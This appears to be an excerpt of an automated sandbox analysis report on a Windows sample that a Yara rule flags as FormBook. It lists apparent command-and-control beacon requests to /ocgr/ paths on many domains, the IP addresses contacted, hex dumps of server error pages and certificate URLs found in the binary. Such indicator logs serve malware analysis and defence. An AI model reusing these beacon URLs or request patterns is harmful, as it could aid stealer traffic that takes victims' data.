          Source: global trafficHTTP traffic detected: GET /ocgr/?1bEX=8ZdUUo4Ko/1EutOgFFh6AcxVD05OKNU9/u1ONjXvKTxnT1suoieA/fu7sDLzfFUskF5Y&D8=x2Ml3P6p HTTP/1.1Host: www.14offresimportantes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?1bEX=sK8+WGPg2JRLe3fUQ4xa6L8WlFBJd5xCkWFiCNREvztrzLZiwMdrfToIj+g37Dk2fKSc&D8=x2Ml3P6p HTTP/1.1Host: www.nagpurmandarin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?1bEX=ViYSIEFv5rwMZxE+N77jXoDFxfL0aS1QvzE+hdAgKT25h9AtQBwV2Ju9rwPnKArhVZH3&D8=x2Ml3P6p HTTP/1.1Host: www.engroconnect.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 185.68.16.179 185.68.16.179
          Source: Joe Sandbox ViewIP Address: 62.149.128.40 62.149.128.40
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 05 Jun 2022 11:05:42 GMTServer: nginx/1.19.10Content-Type: text/html; charset=UTF-8Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2Transfer-Encoding: chunkedData Raw: 31 38 64 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 0a 09 09 09 57 65 6c 63 6f 6d 65 20 26 6d 64 61 73 68 3b 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 09 09 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 0a 09 09 09 73 72 63 3d 22 68 74 74 70 3a 2f 2f 32 62 73 69 6e 67 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 68 74 74 70 3a 2f 2f 32 62 73 69 6e 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 62 6c 75 65 68 6f 73 74 2d 77 6f 72 64 70 72 65 73 73 2d 70 6c 75 67 69 6e 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 63 73 2d 62 6c 75 65 68 6f 73 74 2d 62 67 2e 6a 70 67 22 29 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 74 6f 70 20 72 69 67 68 74 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 09 09 09 7d 0a 0a 09 09 09 2a 20 7b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 09 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 69 6e 70 75 74 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 7d 0a 0a 09 09 09 3a 3a 2d
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 05 Jun 2022 11:06:39 GMTContent-Type: text/htmlContent-Length: 1893Connection: closeETag: "629b66e9-765"x-ray: p988:0.010/wn1005:0.000/Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 20 2d 20 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 b7 d0 b0 d0 b1 d0 bb d0 be d0 ba d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 26 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 63 79 72 69 6c 6c 69 63 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 31 66 34 66 35 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 37 34 37 34 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 5f 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 32 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 5f 62 72 69 65 66 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 20 70 6f 73 69 74
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Sun, 05 Jun 2022 11:07:05 GMTConnection: closeContent-Length: 5040Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 05 Jun 2022 11:07:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 208X-Sorting-Hat-ShopId: 60177744081X-Dc: gcp-europe-west1X-Request-ID: da6285ad-cfd4-42a8-9bcc-1ad102ed9ceeX-XSS-Protection: 1; mode=blockX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenX-Content-Type-Options: nosniffCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 71687171f8c99004-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Sun, 05 Jun 2022 11:07:21 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 05 Jun 2022 11:07:41 GMTContent-Type: text/htmlContent-Length: 291ETag: "6293d166-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 05 Jun 2022 11:07:57 GMTContent-Type: text/htmlContent-Length: 291ETag: "6293d166-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
          Source: gZU26RjMUU.exeString found in binary or memory: http://aia.entrust.net/evcs1-chain256.cer01
          Source: gZU26RjMUU.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: gZU26RjMUU.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: gZU26RjMUU.exeString found in binary or memory: http://crl.entrust.net/evcs1.crl0
          Source: gZU26RjMUU.exeString found in binary or memory: http://crl.entrust.net/g2ca.crl0;
          Source: gZU26RjMUU.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: gZU26RjMUU.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: gZU26RjMUU.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: gZU26RjMUU.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: gZU26RjMUU.exeString found in binary or memory: http://ocsp.digicert.com0C
          Source: gZU26RjMUU.exeString found in binary or memory: http://ocsp.digicert.com0O
          Source: gZU26RjMUU.exeString found in binary or memory: http://ocsp.entrust.net00
          Source: gZU26RjMUU.exeString found in binary or memory: http://ocsp.entrust.net05
          Source: gZU26RjMUU.exeString found in binary or memory: http://www.digicert.com/CPS0
          Source: gZU26RjMUU.exeString found in binary or memory: http://www.entrust.net/rpa0
          Source: rundll32.exe, 0000000B.00000002.949204303.0000000004E82000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.14offresimportantes.com/ocgr/?1bEX=8ZdUUo4Ko/1EutOgFFh6AcxVD05OKNU9/u1ONjXvKTxnT1suoieA/
          Source: gZU26RjMUU.exeString found in binary or memory: https://www.digicert.com/CPS0
          Source: gZU26RjMUU.exeString found in binary or memory: https://www.entrust.net/rpa0
          Source: unknownDNS traffic detected: queries for: www.tubesing.com
          Source: global trafficHTTP traffic detected: GET /ocgr/?8p=qVwdVxLX0&1bEX=9V0bXTkkxKWxDgp6RJOks70x/YcJP31kraxWgvuUzaENE/wb1OUHkodtz4WPL0DBPwKx HTTP/1.1Host: www.tubesing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?1bEX=iHGDCwWI53HcfS+QocK4h8/yIB8fTb9A2eAWw2qT3wOwDe1V57PTmBmkxx0888TI8Tz7&8p=qVwdVxLX0 HTTP/1.1Host: www.ccav11.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?1bEX=aM4AR/Ukf7mSvEjk0rZEh8zH1+Y6GAFwXtGMYQcNHcG0GsWo/Wmk7XSmVo+6tFFOpJhc&8p=qVwdVxLX0 HTTP/1.1Host: www.skb-cabinet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?1bEX=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJicG73GMn4IC&8p=qVwdVxLX0 HTTP/1.1Host: www.mentalnayaarifmetika.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?8p=qVwdVxLX0&1bEX=lpHABYYuY9cv3qxwBx7M5sV/ehU3dY7dp0OhYiYvhJ7rkfr4y7gNIHxTi8LWiO7UdxYH HTTP/1.1Host: www.exceedrigging.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?8p=qVwdVxLX0&1bEX=/7YxqUa/79bB4G9Fxc9MRqyWJ3uHfA/Cqb47Ix/IG5ItadKvR99PpkoJqdMm4bEwSG/T HTTP/1.1Host: www.ageofcryptos.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?1bEX=kkcvVq01iw48hCQBW4MaTtaHwAG6gu+AbY/89EqN09znnDW7xajgziFbmfLdfE+4DaO2&8p=qVwdVxLX0 HTTP/1.1Host: www.tahnforest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?1bEX=RCN0VIpNVc3o/0Xt/AQqQ/q9rwjWgBzqDKIEKCgy7ZwX9axoT0DyuUXrxj1X0+Rk7knz&8p=qVwdVxLX0 HTTP/1.1Host: www.american-atlantic.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?1bEX=8ZdUUo4Ko/1EutOgFFh6AcxVD05OKNU9/u1ONjXvKTxnT1suoieA/fu7sDLzfFUskF5Y&D8=x2Ml3P6p HTTP/1.1Host: www.14offresimportantes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?1bEX=sK8+WGPg2JRLe3fUQ4xa6L8WlFBJd5xCkWFiCNREvztrzLZiwMdrfToIj+g37Dk2fKSc&D8=x2Ml3P6p HTTP/1.1Host: www.nagpurmandarin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?1bEX=ViYSIEFv5rwMZxE+N77jXoDFxfL0aS1QvzE+hdAgKT25h9AtQBwV2Ju9rwPnKArhVZH3&D8=x2Ml3P6p HTTP/1.1Host: www.engroconnect.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
